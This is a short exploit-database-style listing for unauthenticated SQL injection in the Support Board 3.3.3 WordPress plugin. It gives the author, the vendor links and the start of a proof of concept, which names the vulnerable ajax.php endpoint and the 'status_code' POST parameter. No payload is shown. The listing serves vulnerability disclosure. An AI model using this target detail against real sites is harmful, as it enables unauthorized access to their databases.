Support Board 3.3.3 Multiple SQL Injection (Unauthenticated) Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2021-09-15 | Type: webapps | Platform: php
# Exploit Title: Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)
# Date: 29.08.2021
# Exploit Author: John Jefferson Li <yiyohwi@naver.com>
# Vendor Homepage: https://board.support/
# Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943
# Version: 3.3.3
# Tested on: Ubuntu 20.04.2 LTS
----- PoC 1: Error Based SQLi (status_code) -----
Request
POST /wp-content/plugins/supportboard/supportboard/include/ajax.php HTTP/1.1
Vulnerable Parameter: status_code (POST)